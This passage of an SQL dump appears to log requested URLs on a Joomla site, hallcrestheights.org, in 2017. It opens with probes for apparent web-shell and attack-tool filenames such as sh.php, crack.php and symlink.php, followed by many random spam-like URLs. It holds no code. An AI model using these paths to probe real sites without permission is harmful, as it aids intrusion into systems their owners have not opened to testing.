09:58:42','0000-00-00 00:00:00'),(8473,'http://hallcrestheights.org/2.php',NULL,'','',3,0,'2017-04-30 09:58:43','0000-00-00 00:00:00'),(8474,'http://hallcrestheights.org/k.php',NULL,'','',2,0,'2017-04-30 09:58:44','0000-00-00 00:00:00'),(8475,'http://hallcrestheights.org/crack.php',NULL,'','',2,0,'2017-04-30 09:58:45','0000-00-00 00:00:00'),(8476,'http://hallcrestheights.org/myshe.php',NULL,'','',1,0,'2017-04-30 09:58:46','0000-00-00 00:00:00'),(8477,'http://hallcrestheights.org/sh.php',NULL,'','',1,0,'2017-04-30 09:58:47','0000-00-00 00:00:00'),(8478,'http://hallcrestheights.org/aghacker.php',NULL,'','',1,0,'2017-04-30 09:58:48','0000-00-00 00:00:00'),(8479,'http://hallcrestheights.org/xnxx.php',NULL,'','',1,0,'2017-04-30 09:58:49','0000-00-00 00:00:00'),(8480,'http://hallcrestheights.org/az.php',NULL,'','',1,0,'2017-04-30 09:58:51','0000-00-00 00:00:00'),(8481,'http://hallcrestheights.org/azouz.php',NULL,'','',1,0,'2017-04-30 09:58:52','0000-00-00 00:00:00'),(8482,'http://hallcrestheights.org/update.php',NULL,'','',46,0,'2017-04-30 09:58:53','0000-00-00 00:00:00'),(8483,'http://hallcrestheights.org/z.php',NULL,'','',3,0,'2017-04-30 09:58:56','0000-00-00 00:00:00'),(8484,'http://hallcrestheights.org/o.php',NULL,'','',2,0,'2017-04-30 09:58:57','0000-00-00 00:00:00'),(8485,'http://hallcrestheights.org/libraries/joomla/web.php',NULL,'','',26,0,'2017-04-30 09:58:58','0000-00-00 00:00:00'),(8486,'http://hallcrestheights.org/ww3.php',NULL,'','',2,0,'2017-04-30 09:58:59','0000-00-00 00:00:00'),(8487,'http://hallcrestheights.org/xGASSx.php',NULL,'','',1,0,'2017-04-30 09:59:00','0000-00-00 00:00:00'),(8488,'http://hallcrestheights.org/libraries/joomla/1.php',NULL,'','',1,0,'2017-04-30 09:59:01','0000-00-00 00:00:00'),(8489,'http://hallcrestheights.org/libraries/joomla/jmail.php',NULL,'','',33,0,'2017-04-30 09:59:02','0000-00-00 00:00:00'),(8490,'http://hallcrestheights.org/libraries/joomla/jmails.php',NULL,'','',61,0,'2017-04-30 09:59:03','0000-00-00 00:00:00'),(8491,'http://hallcrestheights.org/e0.php',NULL,'','',1,0,'2017-04-30 09:59:05','0000-00-00 00:00:00'),(8492,'http://hallcrestheights.org/by.php',NULL,'','',21,0,'2017-04-30 09:59:06','0000-00-00 00:00:00'),(8493,'http://hallcrestheights.org/hh.php',NULL,'','',27,0,'2017-04-30 09:59:07','0000-00-00 00:00:00'),(8494,'http://hallcrestheights.org/IN.php',NULL,'','',1,0,'2017-04-30 09:59:11','0000-00-00 00:00:00'),(8495,'http://hallcrestheights.org/adminer.php',NULL,'','',1,0,'2017-04-30 09:59:12','0000-00-00 00:00:00'),(8496,'http://hallcrestheights.org/symlink.php',NULL,'','',1,0,'2017-04-30 09:59:14','0000-00-00 00:00:00'),(8497,'http://hallcrestheights.org/kk.php',NULL,'','',27,0,'2017-04-30 09:59:15','0000-00-00 00:00:00'),(8498,'http://hallcrestheights.org/reko.php',NULL,'','',1,0,'2017-04-30 09:59:16','0000-00-00 00:00:00'),(8499,'http://hallcrestheights.org/walexnoob.php',NULL,'','',1,0,'2017-04-30 09:59:17','0000-00-00 00:00:00'),(8500,'http://hallcrestheights.org/autocracker.php',NULL,'','',1,0,'2017-04-30 09:59:19','0000-00-00 00:00:00'),(8501,'http://hallcrestheights.org/k2l33d.php',NULL,'','',1,0,'2017-04-30 09:59:21','0000-00-00 00:00:00'),(8502,'http://hallcrestheights.org/cPanels.php',NULL,'','',1,0,'2017-04-30 09:59:22','0000-00-00 00:00:00'),(8503,'http://hallcrestheights.org/run.php',NULL,'','',1,0,'2017-04-30 09:59:24','0000-00-00 00:00:00'),(8504,'http://hallcrestheights.org/unzip.php',NULL,'','',1,0,'2017-04-30 09:59:25','0000-00-00 00:00:00'),(8505,'http://hallcrestheights.org/D.php',NULL,'','',1,0,'2017-04-30 09:59:26','0000-00-00 00:00:00'),(8506,'http://hallcrestheights.org/2all.php',NULL,'','',1,0,'2017-04-30 09:59:28','0000-00-00 00:00:00'),(8507,'http://hallcrestheights.org/sys.php',NULL,'','',1,0,'2017-04-30 09:59:30','0000-00-00 00:00:00'),(8508,'http://www.hallcrestheights.org/mrcqgb-eifuwg-k48236-rabtnw-i20162637-yrqs-emgwko-whmemx.htm',NULL,'','',1,0,'2017-04-30 11:20:58','0000-00-00 00:00:00'),(8509,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-i20162634-k31984-rdhcpgzz.htm',NULL,'','',2,0,'2017-04-30 11:48:27','0000-00-00 00:00:00'),(8510,'http://www.hallcrestheights.org/ajqx-i20162629-k59345-xucuzao-fifephi-ijimj/',NULL,'','',3,0,'2017-04-30 12:37:45','0000-00-00 00:00:00'),(8511,'http://www.hallcrestheights.org/i20162636-k49976-upttmn-beatgr-bnqcdc-ncxr.htm',NULL,'','',2,0,'2017-04-30 13:02:50','0000-00-00 00:00:00'),(8512,'http://www.hallcrestheights.org/ixnmueah-i20162629-whioz-k41000-hjxbnwpg-eyooayi-kuks-szqce.htm',NULL,'','',2,0,'2017-04-30 13:33:24','0000-00-00 00:00:00'),(8513,'http://www.hallcrestheights.org/i20162635-yembj-vhtqqd-k13777-ckzfl-tzte-rqbwnsw/',NULL,'','',2,0,'2017-04-30 13:40:44','0000-00-00 00:00:00'),(8514,'http://www.hallcrestheights.org/k61900-lugdltrs-mxxhy-pzqjllzo-hnjumnt-i20162629-ecwf.htm',NULL,'','',2,0,'2017-04-30 14:14:04','0000-00-00 00:00:00'),(8515,'http://www.hallcrestheights.org/k24956-dvisci-i20162629-wbvwku-xkrbzo-msmv.htm',NULL,'','',2,0,'2017-04-30 14:38:04','0000-00-00 00:00:00'),(8516,'http://www.hallcrestheights.org/i20162630-lugd-ltrsmxx-k61432-hypzq-jllzoh-njumnte.htm',NULL,'','',2,0,'2017-04-30 14:44:59','0000-00-00 00:00:00'),(8517,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-i20162637-gefv-bbgzagp-k11777-eciyyuwu/',NULL,'','',2,0,'2017-04-30 14:50:11','0000-00-00 00:00:00'),(8518,'http://www.hallcrestheights.org/k37465-kzpf-fmsxklr-dedhwge-i20162633-fvbbg-zagpe/',NULL,'','',2,0,'2017-04-30 16:06:00','0000-00-00 00:00:00'),(8519,'http://www.hallcrestheights.org/ixnmue-k48436-ahwhio-i20162637-zhjxbn-wpge-yooayi.htm',NULL,'','',2,0,'2017-04-30 16:22:06','0000-00-00 00:00:00'),(8520,'http://www.hallcrestheights.org/gnfznx-k48976-vjxpal-i20162637-titjsh-kyjy-ldpija.htm',NULL,'','',2,0,'2017-04-30 16:35:50','0000-00-00 00:00:00'),(8521,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-i20162628-abtnwyrq-k13084-semgwkow.htm',NULL,'','',2,0,'2017-04-30 16:36:23','0000-00-00 00:00:00'),(8522,'http://www.hallcrestheights.org/zmkuedt-zjivyoqx-ifgxuhxp-i20162628-k53908-tvuhmiw-nzkorp.htm',NULL,'','',2,0,'2017-04-30 17:21:15','0000-00-00 00:00:00'),(8523,'http://www.hallcrestheights.org/bsoapaz-apsta-i20162637-sgmhcq-k28033-cmckfr-dtfkg/',NULL,'','',2,0,'2017-04-30 18:22:19','0000-00-00 00:00:00'),(8524,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-k32224-qxifgxuh-i20162636-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',2,0,'2017-04-30 18:38:57','0000-00-00 00:00:00'),(8525,'http://www.hallcrestheights.org/i20162636-kzpff-k36737-msxklr-dedhw-gefv/',NULL,'','',2,0,'2017-04-30 19:44:09','0000-00-00 00:00:00'),(8526,'http://www.hallcrestheights.org/i20162630-tkuykfj-dnjjb-ucyupa-k15253-jaylrl-wfvdy/',NULL,'','',1,0,'2017-04-30 20:06:17','0000-00-00 00:00:00'),(8527,'http://www.hallcrestheights.org/i20162628-k26792-jgle-tkymdrq-znrvm-lkswaz.htm',NULL,'','',3,0,'2017-04-30 20:21:20','0000-00-00 00:00:00'),(8528,'http://www.hallcrestheights.org/tkuykfj-i20162636-dnjjb-ucyupa-k10573-jaylrl-wfvdy/',NULL,'','',2,0,'2017-04-30 22:54:35','0000-00-00 00:00:00'),(8529,'http://www.hallcrestheights.org/k35080-mrcqgbei-fuwgr-abtnwyrq-semgwko-i20162629-whme.htm',NULL,'','',2,0,'2017-05-01 00:38:13','0000-00-00 00:00:00'),(8530,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb-qxdosf-k49333-ietyu-i20162637-aixn-rbdggs/',NULL,'','',2,0,'2017-05-01 02:10:24','0000-00-00 00:00:00'),(8531,'http://www.hallcrestheights.org/vqjnys-k28276-pvholj-i20162637-peurrt-pilu-ourxiv.htm',NULL,'','',2,0,'2017-05-01 02:31:07','0000-00-00 00:00:00'),(8532,'http://www.hallcrestheights.org/i20162628-k34784-dvisc-iwbv-wkux-krbzomsm.htm',NULL,'','',2,0,'2017-05-01 05:04:38','0000-00-00 00:00:00'),(8533,'http://www.hallcrestheights.org/yemb-i20162637-k51425-jvhtqqd-ckzfltz-terqb/',NULL,'','',2,0,'2017-05-01 05:37:02','0000-00-00 00:00:00'),(8534,'http://www.hallcrestheights.org/i20162635-yembj-vhtqqd-k25477-ckzfl-tzte-rqbwnsw/',NULL,'','',4,0,'2017-05-01 07:21:21','0000-00-00 00:00:00'),(8535,'http://www.hallcrestheights.org/k31184-zmkue-dtzj-i20162634-ivyo-qxifgxuh.htm',NULL,'','',2,0,'2017-05-01 09:34:57','0000-00-00 00:00:00'),(8536,'http://www.hallcrestheights.org/k35980-dvisciwb-i20162631-vwkux-krbzomsm-vuclzup-hvqa.htm',NULL,'','',2,0,'2017-05-01 10:24:45','0000-00-00 00:00:00'),(8537,'http://www.hallcrestheights.org/cwhri-i20162636-wgpekz-k57337-qdwkv-umzb-saiimjz/',NULL,'','',2,0,'2017-05-01 11:03:48','0000-00-00 00:00:00'),(8538,'http://www.hallcrestheights.org/k41200-ryvhrhmq-tyysl-lgeajanp-dmefnxh-i20162629-qfhj.htm',NULL,'','',2,0,'2017-05-01 11:46:07','0000-00-00 00:00:00'),(8539,'http://www.hallcrestheights.org/i20162628-k47492-ryvh-rhmqtyy-sllge-ajanpd.htm',NULL,'','',3,0,'2017-05-01 12:08:35','0000-00-00 00:00:00'),(8540,'http://www.hallcrestheights.org/cwhriwgp-k11941-ekzq-dwkvumz-bsaiimjz-i20162629-fozgdvdd/',NULL,'','',2,0,'2017-05-01 12:34:16','0000-00-00 00:00:00'),(8541,'http://www.hallcrestheights.org/i20162630-k49480-edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh.htm',NULL,'','',2,0,'2017-05-01 12:34:33','0000-00-00 00:00:00'),(8542,'http://www.hallcrestheights.org/cwhri-k45377-wgpekz-qdwkv-i20162635-umzb/',NULL,'','',2,0,'2017-05-01 12:58:03','0000-00-00 00:00:00'),(8543,'http://www.hallcrestheights.org/mrcqgb-eifuwg-i20162636-k50576-rabtnw-yrqs-emgwko-whmemx.htm',NULL,'','',2,0,'2017-05-01 13:44:58','0000-00-00 00:00:00'),(8544,'http://www.hallcrestheights.org/k49580-ixnmueah-whioz-i20162630-hjxbnwpg-eyooayi.htm',NULL,'','',2,0,'2017-05-01 14:25:29','0000-00-00 00:00:00'),(8545,'http://www.hallcrestheights.org/kzpff-k3977-msxklr-dedhw-i20162635-gefv/',NULL,'','',2,0,'2017-05-01 15:02:51','0000-00-00 00:00:00'),(8546,'http://www.hallcrestheights.org/ixnmu-i20162636-eahw-hioz-hjxbnwpg-k32524-eyooayik.htm',NULL,'','',2,0,'2017-05-01 16:03:35','0000-00-00 00:00:00'),(8547,'http://www.hallcrestheights.org/oiyizgo-i20162636-lrcmw-fbsnop-k31273-dgfnhs-krljr/',NULL,'','',3,0,'2017-05-01 16:40:09','0000-00-00 00:00:00'),(8548,'http://www.hallcrestheights.org/soegs-i20162636-zxyife-k36637-tvtnd-yuuh-vfcyzls/',NULL,'','',2,0,'2017-05-01 17:18:53','0000-00-00 00:00:00'),(8549,'http://www.hallcrestheights.org/i20162636-k32624-lugdl-trsm-xxhy-pzqjllzo.htm',NULL,'','',2,0,'2017-05-01 18:13:04','0000-00-00 00:00:00'),(8550,'http://www.hallcrestheights.org/qlbow-ciggec/eayaf-i20162635-k14327-xrgl/',NULL,'','',3,0,'2017-05-01 18:45:53','0000-00-00 00:00:00'),(8551,'http://www.hallcrestheights.org/oiyi-i20162633-k37565-zgolrcm-wfbsnop-dgfnh/',NULL,'','',2,0,'2017-05-01 19:04:42','0000-00-00 00:00:00'),(8552,'http://www.hallcrestheights.org/wbwpbon-kydhx-k33133-jjikvf-vtzpxb-i20162636-xkcwj-ybty-lwosdu/',NULL,'','',2,0,'2017-05-01 20:18:18','0000-00-00 00:00:00'),(8553,'http://www.hallcrestheights.org/nfrko-k13877-pdobbu-mgolz-i20162635-esrk/',NULL,'','',2,0,'2017-05-01 20:56:33','0000-00-00 00:00:00'),(8554,'http://www.hallcrestheights.org/k59245-tkuy-kfjdnjj-bucyupa-jaylr-i20162629-lwfvd/',NULL,'','',6,0,'2017-05-01 21:20:16','0000-00-00 00:00:00'),(8555,'http://www.hallcrestheights.org/k57500-vqjnyspv-i20162633-holjp-eurrtpil-uourxiv.htm',NULL,'','',2,0,'2017-05-01 21:20:46','0000-00-00 00:00:00'),(8556,'http://www.hallcrestheights.org/nfrkopd-k11173-obbum-golzes-rkwtzq-i20162636-tqbsv-jcwj-bxnmyv/',NULL,'','',2,0,'2017-05-01 21:34:43','0000-00-00 00:00:00'),(8557,'http://www.hallcrestheights.org/k35080-mrcqgbei-i20162631-fuwgr-abtnwyrq-semgwko-whme.htm',NULL,'','',2,0,'2017-05-01 23:53:35','0000-00-00 00:00:00'),(8558,'http://www.hallcrestheights.org/xhaj-k17045-vqlwczb-i20162630-iqsosqx-oqkgq/',NULL,'','',2,0,'2017-05-01 23:56:20','0000-00-00 00:00:00'),(8559,'http://www.hallcrestheights.org/wbwpb-i20162635-onkydh-xjjik-vfvt-zpxbxkc-k45977-wjybtylw/',NULL,'','',2,0,'2017-05-02 00:14:11','0000-00-00 00:00:00'),(8560,'http://www.hallcrestheights.org/i20162636-k50876-lugdlt-rsmxxh-ypzqjl-lzoh.htm',NULL,'','',2,0,'2017-05-02 00:33:28','0000-00-00 00:00:00'),(8561,'http://www.hallcrestheights.org/i20162628-soegsz-xyifetvt-ndyu-uhvfc-yzls-k57749-xxqroxa/',NULL,'','',5,0,'2017-05-02 00:35:10','0000-00-00 00:00:00'),(8562,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-uhvfcy-zlsxx-i20162630-qrox-k45373-aehksk/',NULL,'','',6,0,'2017-05-02 00:38:56','0000-00-00 00:00:00'),(8563,'http://www.hallcrestheights.org/kzpffm-i20162633-k8189-sxklrded-hwge-fvbbg/',NULL,'','',1,0,'2017-05-02 00:40:13','0000-00-00 00:00:00'),(8564,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-semgwko-i20162632-whme-mxgku-cybnpz-kicv-k15320-ejxkulzj-cjkntsxj-lnuuuv-tffcgy.htm',NULL,'','',3,0,'2017-05-02 00:45:14','0000-00-00 00:00:00'),(8565,'http://www.hallcrestheights.org/i20162632-edzvdlqc-omnnm-k36220-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb.htm',NULL,'','',1,0,'2017-05-02 00:47:45','0000-00-00 00:00:00'),(8566,'http://www.hallcrestheights.org/zmkued-tzjivy-oqxifg-xuhx-k48136-ptvuhm-i20162637-iwnzko-rpvub.htm',NULL,'','',2,0,'2017-05-02 01:07:05','0000-00-00 00:00:00'),(8567,'http://www.hallcrestheights.org/yemb-jvhtqqd-ckzfltz-terqb-wnswn-i20162633-k38165-snjplpf/',NULL,'','',2,0,'2017-05-02 01:10:11','0000-00-00 00:00:00'),(8568,'http://www.hallcrestheights.org/pcsc-qrufunp-k11162-kwxpo-ideotw/tvsoarm-osmgepla-i20162634-lheliyr-qiyqfufx-vugo-wopegtqa-mzimczjv-hohtedh.htm',NULL,'','',2,0,'2017-05-02 01:20:29','0000-00-00 00:00:00'),(8569,'http://www.hallcrestheights.org/xhaj-i20162633-k59165-vqlwczb-iqsosqx-oqkgq/',NULL,'','',1,0,'2017-05-02 01:47:02','0000-00-00 00:00:00'),(8570,'http://www.hallcrestheights.org/cwhr-iwgpekz-qdwkvum-zbsai-imjzf-i20162633-k37265-ozgdvdd/',NULL,'','',3,0,'2017-05-02 03:19:04','0000-00-00 00:00:00'),(8571,'http://www.hallcrestheights.org/k48433-oiyizgo-lrcmw-fbsnop-dgfnhs-krljr-i20162637-gfct-fzfiwx/',NULL,'','',2,0,'2017-05-02 03:42:11','0000-00-00 00:00:00'),(8572,'http://www.hallcrestheights.org/wbwpbon-kydhx-i20162637-jjikvf-k48733-vtzpxb-xkcwj/',NULL,'','',2,0,'2017-05-02 04:07:04','0000-00-00 00:00:00'),(8573,'http://www.hallcrestheights.org/fadlaj-k24856-fnlgfp-cvwgmy-hdec-i20162629-wxbdeu.htm',NULL,'','',2,0,'2017-05-02 04:09:26','0000-00-00 00:00:00'),(8574,'http://www.hallcrestheights.org/i20162635-k23380-mrcqgbei-fuwgr-abtnwyrq-semgwko-whme.htm',NULL,'','',2,0,'2017-05-02 05:02:09','0000-00-00 00:00:00'),(8575,'http://www.hallcrestheights.org/k15200-ryvhrhmq-tyysl-i20162634-lgeajanp-dmefnxh.htm',NULL,'','',2,0,'2017-05-02 05:38:23','0000-00-00 00:00:00'),(8576,'http://www.hallcrestheights.org/kzpffms-xklrd-i20162630-edhwge-fvbbgz-agpec-k15053-iyyu/',NULL,'','',2,0,'2017-05-02 05:45:24','0000-00-00 00:00:00'),(8577,'http://www.hallcrestheights.org/htxwh-ykrsvs-i20162636-vhudy-kbqx-dosfiet-k36437-yuaixnrb/',NULL,'','',3,0,'2017-05-02 06:43:13','0000-00-00 00:00:00'),(8578,'http://www.hallcrestheights.org/k59065-nfrk-opdobbu-mgolzes-i20162633-rkwtz-qtqbs/',NULL,'','',2,0,'2017-05-02 07:13:17','0000-00-00 00:00:00'),(8579,'http://www.hallcrestheights.org/ajqxx-k49517-ucuzao-i20162634-fifep-hiij/',NULL,'','',2,0,'2017-05-02 07:17:52','0000-00-00 00:00:00'),(8580,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k57200-vwgmyhde-cwxbdeu-dkov-i20162633-fiibp.htm',NULL,'','',2,0,'2017-05-02 07:21:13','0000-00-00 00:00:00'),(8581,'http://www.hallcrestheights.org/htxwhykr-svsv-k7681-hudykbq-xdosfiet-i20162629-yuaixnrb-dggs-aarh/',NULL,'','',2,0,'2017-05-02 07:29:17','0000-00-00 00:00:00'),(8582,'http://www.hallcrestheights.org/i20162628-pcscq-rufu-k34484-npkw-xpoideot-wtvsoarm-osmgep.htm',NULL,'','',2,0,'2017-05-02 07:38:27','0000-00-00 00:00:00'),(8583,'http://www.hallcrestheights.org/i20162636-soegs-k57437-zxyife-tvtnd-yuuh/',NULL,'','',1,0,'2017-05-02 08:07:57','0000-00-00 00:00:00'),(8584,'http://www.hallcrestheights.org/htxwhyk-rsvsv-i20162636-hudykb-qxdosf-ietyu-k11633-aixn/',NULL,'','',2,0,'2017-05-02 08:24:33','0000-00-00 00:00:00'),(8585,'http://www.hallcrestheights.org/upttmn-beatgr-bnqcdc-ncxr-dhcpgz-i20162637-k48676-zdllim-vyxjl.htm',NULL,'','',1,0,'2017-05-02 09:00:38','0000-00-00 00:00:00'),(8586,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb-qxdos-i20162632-fiet-k26609-yuaixnr/',NULL,'','',2,0,'2017-05-02 09:05:47','0000-00-00 00:00:00'),(8587,'http://www.hallcrestheights.org/ajqxxucu-i20162629-k11141-zaof-ifephii-jimjnjbo/',NULL,'','',1,0,'2017-05-02 10:05:44','0000-00-00 00:00:00'),(8588,'http://www.hallcrestheights.org/ajqxxuc-k15353-uzaof-i20162630-ifephi-ijimjn/',NULL,'','',2,0,'2017-05-02 10:13:34','0000-00-00 00:00:00'),(8589,'http://www.hallcrestheights.org/soegs-i20162635-zxyife/tvtnd-yuuh-vfcyzls-k14927-xxqroxae/',NULL,'','',2,0,'2017-05-02 10:15:48','0000-00-00 00:00:00'),(8590,'http://www.hallcrestheights.org/kzpffmsx-k7981-klrd-edhwgef-vbbgzagp-i20162629-eciyyuwu/',NULL,'','',2,0,'2017-05-02 10:20:43','0000-00-00 00:00:00'),(8591,'http://www.hallcrestheights.org/xhajvqlw-czbi-qsosqxo-k28381-qkgqaqyd-i20162629-cptznzvt-jqoe-vpca/',NULL,'','',2,0,'2017-05-02 10:38:03','0000-00-00 00:00:00'),(8592,'http://www.hallcrestheights.org/ajqxx-ucuzao-k28717-fifep-hiij-i20162634-imjnjbo/',NULL,'','',2,0,'2017-05-02 11:26:03','0000-00-00 00:00:00'),(8593,'http://www.hallcrestheights.org/k14300-fadlajfn-lgfpc-i20162634-vwgmyhde-cwxbdeu.htm',NULL,'','',2,0,'2017-05-02 11:43:08','0000-00-00 00:00:00'),(8594,'http://www.hallcrestheights.org/xhaj-vqlwczb-iqsosqx-i20162628-k8725-oqkgq-aqydc-ptznzvt-jqoe/',NULL,'','',2,0,'2017-05-02 12:48:17','0000-00-00 00:00:00'),(8595,'http://www.hallcrestheights.org/edzvdl-qcomnn-i20162636-k29876-mmcawv-bfuj-apyvrl-flxhqj.htm',NULL,'','',2,0,'2017-05-02 12:53:40','0000-00-00 00:00:00'),(8596,'http://www.hallcrestheights.org/bsoapaz-i20162637-k48833-apsta-sgmhcq-cmckfr/',NULL,'','',2,0,'2017-05-02 13:23:12','0000-00-00 00:00:00'),(8597,'http://www.hallcrestheights.org/k24056-mrcqgb-i20162629-eifuwg-rabtnw-yrqs.htm',NULL,'','',2,0,'2017-05-02 13:24:38','0000-00-00 00:00:00'),(8598,'http://www.hallcrestheights.org/i20162630-k28780-ixnmueah-whioz-hjxbnwpg-eyooayi-kuks.htm',NULL,'','',3,0,'2017-05-02 13:34:20','0000-00-00 00:00:00'),(8599,'http://www.hallcrestheights.org/edzv-dlqcomn-k58892-nmmca-i20162631-wvbfuj-apyvrlf-lxhqjkuh.htm',NULL,'','',4,0,'2017-05-02 13:56:54','0000-00-00 00:00:00'),(8600,'http://www.hallcrestheights.org/i20162628-htxwhykr-k27701-svsv-hudykbq-xdosfiet/',NULL,'','',2,0,'2017-05-02 14:17:58','0000-00-00 00:00:00'),(8601,'http://www.hallcrestheights.org/i20162634-pcscq-rufu-k11084-npkw-xpoideot-wtvsoarm-osmgep.htm',NULL,'','',2,0,'2017-05-02 14:20:15','0000-00-00 00:00:00'),(8602,'http://www.hallcrestheights.org/htxwh-i20162635-ykrsvs-vhudy-kbqx-dosfiet-k3677-yuaixnrb/',NULL,'','',1,0,'2017-05-02 14:28:27','0000-00-00 00:00:00'),(8603,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-k43628-gmyhdecw-i20162637-xbdeudk-ovfiib-ptquh.htm',NULL,'','',2,0,'2017-05-02 14:56:35','0000-00-00 00:00:00'),(8604,'http://www.hallcrestheights.org/bsoap-azapst-i20162636-asgmh-cqcm-ckfrdtf-k58037-kgpvbchs/',NULL,'','',3,0,'2017-05-02 16:02:06','0000-00-00 00:00:00'),(8605,'http://www.hallcrestheights.org/i20162634-edzvdlqc-omnnm-k14900-mcawvbfu-japyvrl-flxh-qjkuh.htm',NULL,'','',3,0,'2017-05-02 16:18:07','0000-00-00 00:00:00'),(8606,'http://www.hallcrestheights.org/k11641-nfrkopdo-bbum-golzesr-kwtzqtqb-i20162629-svjcwjbx-nmyv-sssl/',NULL,'','',3,0,'2017-05-02 17:08:32','0000-00-00 00:00:00'),(8607,'http://www.hallcrestheights.org/cwhri-k14827-wgpekz-qdwkv/i20162635-umzb-saiimjz-fozgdvdd-qjvdobkn/',NULL,'','',2,0,'2017-05-02 17:44:25','0000-00-00 00:00:00'),(8608,'http://www.hallcrestheights.org/soegsz-xyifetvt-i20162632-ndyu-uhvfc-k26809-yzls/',NULL,'','',4,0,'2017-05-02 17:49:08','0000-00-00 00:00:00'),(8609,'http://www.hallcrestheights.org/cwhriwgp-i20162629-ekzq-dwkvumz-bsaiimjz-fozgdvdd-k7781-qjvd/',NULL,'','',4,0,'2017-05-02 18:53:12','0000-00-00 00:00:00'),(8610,'http://www.hallcrestheights.org/kzpffms-xklrd-i20162636-edhwge-fvbbgz-agpec-k10373-iyyu/',NULL,'','',2,0,'2017-05-02 19:08:44','0000-00-00 00:00:00'),(8611,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-uhvfc-i20162632-yzls-k60089-xxqroxa/',NULL,'','',13,0,'2017-05-02 20:20:53','0000-00-00 00:00:00'),(8612,'http://www.hallcrestheights.org/tkuyk-fjdnjj-k49417-bucyu-paja-i20162634-ylrlwfv/',NULL,'','',2,0,'2017-05-02 20:54:52','0000-00-00 00:00:00'),(8613,'http://www.hallcrestheights.org/edzvdl-qcomnn-k6736-mmcawv-i20162628-bfuj-apyvrl-flxhqj-kuhkc.htm',NULL,'','',2,0,'2017-05-02 21:47:00','0000-00-00 00:00:00'),(8614,'http://www.hallcrestheights.org/k7045-kzpf-fmsxklr-i20162637-dedhwge-fvbbg-zagpe/',NULL,'','',2,0,'2017-05-02 21:59:29','0000-00-00 00:00:00'),(8615,'http://www.hallcrestheights.org/i20162632-k12536-upttmn-beatgr-bnqcdc-ncxr.htm',NULL,'','',2,0,'2017-05-02 22:18:09','0000-00-00 00:00:00'),(8616,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik-vfvt-i20162636-zpxbxkc-k57937-wjybtylw-osduieqg/',NULL,'','',2,0,'2017-05-02 22:42:08','0000-00-00 00:00:00'),(8617,'http://www.hallcrestheights.org/k15100-lugdltrs-mxxhy-pzqjllzo-hnjumnt-i20162634-ecwf.htm',NULL,'','',2,0,'2017-05-02 22:44:42','0000-00-00 00:00:00'),(8618,'http://www.hallcrestheights.org/kzpffmsx-i20162629-k28781-klrd-edhwgef-vbbgzagp/',NULL,'','',2,0,'2017-05-02 22:46:20','0000-00-00 00:00:00'),(8619,'http://www.hallcrestheights.org/k61100-fadlajfn-i20162629-lgfpc-vwgmyhde-cwxbdeu.htm',NULL,'','',2,0,'2017-05-02 23:25:21','0000-00-00 00:00:00'),(8620,'http://www.hallcrestheights.org/qlbowci-i20162637-k28133-ggece-ayafxr-glnikg/',NULL,'','',2,0,'2017-05-02 23:35:39','0000-00-00 00:00:00'),(8621,'http://www.hallcrestheights.org/soegszx-k14953-yifet-vtndyu-uhvfcy-zlsxx-i20162630-qrox-aehksk/',NULL,'','',2,0,'2017-05-03 00:33:30','0000-00-00 00:00:00'),(8622,'http://www.hallcrestheights.org/k24556-jgletk-ymdrqz-nrvmlk-swaz-i20162629-vkecqq-neeiaq-jzlnp.htm',NULL,'','',2,0,'2017-05-03 00:43:20','0000-00-00 00:00:00'),(8623,'http://www.hallcrestheights.org/i20162634-jglet-kymd-k31784-rqzn-rvmlkswa-zvkecqqn-eeiaqj.htm',NULL,'','',2,0,'2017-05-03 01:13:17','0000-00-00 00:00:00'),(8624,'http://www.hallcrestheights.org/k27745-soeg-szxyife-i20162637-tvtndyu-uhvfc-yzlsx/',NULL,'','',2,0,'2017-05-03 01:18:40','0000-00-00 00:00:00'),(8625,'http://www.hallcrestheights.org/bsoap-i20162635-azapst-asgmh-cqcm-ckfrdtf-k25277-kgpvbchs/',NULL,'','',2,0,'2017-05-03 01:20:20','0000-00-00 00:00:00'),(8626,'http://www.hallcrestheights.org/vqjnysp-vholjpeu-i20162637-rrtpiluo-k23128-urxivlb-trhnnm.htm',NULL,'','',2,0,'2017-05-03 01:30:58','0000-00-00 00:00:00'),(8627,'http://www.hallcrestheights.org/xhajvql-wczbi-i20162636-qsosqx-oqkgqa-qydcp-k11273-tznz/',NULL,'','',2,0,'2017-05-03 01:39:00','0000-00-00 00:00:00'),(8628,'http://www.hallcrestheights.org/pcscqruf-i20162629-unpkw-k40100-xpoideot-wtvsoar-mosm-gepla.htm',NULL,'','',2,0,'2017-05-03 01:40:53','0000-00-00 00:00:00'),(8629,'http://www.hallcrestheights.org/i20162628-htxw-hykrsvs-vhudykb-qxdos-fiety-k8825-uaixnrb/',NULL,'','',2,0,'2017-05-03 01:41:41','0000-00-00 00:00:00'),(8630,'http://www.hallcrestheights.org/i20162632-lugdlt-rsmxxh-ypzqjl-lzoh-njumnt-k12136-ecwfog-ywbiw.htm',NULL,'','',2,0,'2017-05-03 02:03:20','0000-00-00 00:00:00'),(8631,'http://www.hallcrestheights.org/k51416-vqjnys-pvholj-i20162634-peurrt-pilu.htm',NULL,'','',6,0,'2017-05-03 02:20:31','0000-00-00 00:00:00'),(8632,'http://www.hallcrestheights.org/tkuyk-fjdnjj-i20162637-k11977-bucyu-paja-ylrlwfv/',NULL,'','',2,0,'2017-05-03 02:29:15','0000-00-00 00:00:00'),(8633,'http://www.hallcrestheights.org/mrcqgb-eifuwg-rabtnw-yrqs-i20162636-emgwko-k29776-whmemx-gkucy.htm',NULL,'','',2,0,'2017-05-03 03:12:07','0000-00-00 00:00:00'),(8634,'http://www.hallcrestheights.org/k23228-zmkuedt-i20162637-zjivyoqx-ifgxuhxp-tvuhmiw.htm',NULL,'','',2,0,'2017-05-03 03:24:21','0000-00-00 